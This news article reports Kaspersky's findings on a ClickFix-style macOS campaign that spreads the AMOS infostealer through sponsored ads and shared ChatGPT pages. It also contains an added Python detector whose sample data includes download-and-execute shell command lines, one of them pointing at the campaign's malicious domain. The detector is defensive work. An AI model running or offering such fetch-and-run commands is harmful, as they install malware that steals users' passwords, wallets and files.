Kaspersky Threat Research has identified a new malware campaign targeting macOS users, which uses paid Google search advertisements and shared conversations on the official ChatGPT website to distribute the AMOS (Atomic macOS Stealer) infostealer along with a persistent backdoor.
According to Kaspersky, the attackers purchase sponsored search ads linked to terms such as “chatgpt atlas.” Users clicking on these ads are redirected to a page appearing to be an installation guide for “ChatGPT Atlas for macOS.” While the page is hosted on chatgpt.com and resembles a shared ChatGPT conversation, the content is in fact carefully crafted through prompt engineering to display only step-by-step installation instructions.
The guide instructs users to copy a single line of code, open the Terminal application on macOS, paste the command, and grant all requested permissions. Kaspersky’s analysis shows that this command downloads and executes a malicious script from an external domain, atlas-extension[.]com.
Once executed, the script repeatedly asks for the user’s system password, verifying it by running system-level commands. After obtaining the correct password, the malware downloads and installs the AMOS infostealer, which then begins collecting sensitive data. The infection method is a variation of the “ClickFix” technique, relying on users to manually run shell commands that fetch malicious code from remote servers.
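The download-and-execute behaviour described above can be hunted for in process command-line telemetry. The following Python is an added example, not taken from Kaspersky's report: the regexes, function names and sample command lines are constructed for illustration, and only the domain comes from the article.

```python
import re

# Domain named in the article, kept defanged in source and refanged for matching.
IOC_DOMAINS = {"atlas-extension[.]com".replace("[.]", ".")}

FETCH = r"(?:curl|wget)"
SHELL = r"(?:sh|bash|zsh|osascript)"
# Download piped straight into an interpreter: <fetch> ... | [sudo] <shell>
PIPE_EXEC = re.compile(rf"\b{FETCH}\b[^|;&]*\|\s*(?:sudo\s+)?{SHELL}\b")
# Download inside command/process substitution handed to an interpreter.
SUBST_EXEC = re.compile(rf"\b{SHELL}\b[^|;&]*(?:\$\(|<\(|`)\s*{FETCH}\b")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)


def classify(cmdline: str) -> list[str]:
    """Return the reasons a command line looks like a pasted download-and-run."""
    reasons = []
    if PIPE_EXEC.search(cmdline):
        reasons.append("fetch-piped-to-shell")
    if SUBST_EXEC.search(cmdline):
        reasons.append("fetch-in-substitution")
    for host in URL_HOST.findall(cmdline):
        host = host.lower().rstrip(".")
        if any(host == d or host.endswith("." + d) for d in IOC_DOMAINS):
            reasons.append(f"ioc-domain:{host}")
    return reasons


def scan(cmdlines):
    """Map each flagged command line to its reasons; clean lines are omitted."""
    return {c: r for c in cmdlines if (r := classify(c))}


# Constructed sample telemetry (not the campaign's real command); paths are placeholders.
IOC = next(iter(IOC_DOMAINS))
SAMPLE_CMDLINES = [
    f'/bin/bash -c "$(curl -fsSL https://{IOC}/PLACEHOLDER)"',
    "curl -fsSL https://downloads.example.org/install.sh | sh",
    "curl -O https://downloads.example.org/tool.dmg",
    "brew install wget",
]

if __name__ == "__main__":
    for cmd, why in scan(SAMPLE_CMDLINES).items():
        print(f"ALERT {why}: {cmd}")
```

The behavioural rules also fire on legitimate installers that use the same one-liner pattern, so treat those hits as triage leads; a match on the article's domain is the higher-confidence signal.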
AMOS is designed to harvest information that can be monetized or reused in further attacks. It targets passwords and cookies from popular web browsers, cryptocurrency wallets such as Electrum, Coinomi, and Exodus, as well as applications including Telegram Desktop and OpenVPN Connect. The malware also scans files in Desktop, Documents, and Downloads folders, along with notes stored in the macOS Notes app, sending the data to attacker-controlled servers.
In addition to the infostealer, the campaign installs a backdoor that remains active across system reboots. The backdoor provides attackers with remote access and replicates much of AMOS’s data collection.
Kaspersky highlighted that infostealers are among the fastest-growing cyber threats in 2025, with attackers increasingly exploiting AI-related themes, fake AI tools, and AI-generated content to lend credibility to their lures. The Atlas-themed campaign illustrates this trend by abusing a legitimate AI platform’s content-sharing features.
“What makes this case effective is not a sophisticated exploit, but the way social engineering is wrapped in a familiar AI context,” said Vladimir Gursky, malware analyst at Kaspersky. “A sponsored link leads to a well-formatted page on a trusted domain, and the ‘installation guide’ is just a single Terminal command. For many users, that combination of trust and simplicity is enough to bypass their usual caution, yet the result is full compromise of the system and long-term access for the attacker.”
Kaspersky urged users to exercise caution when following unsolicited guides that require running Terminal or PowerShell commands. Users are advised to verify suspicious instructions, avoid unclear scripts, and ensure that reputable security software is installed and up to date on macOS devices.
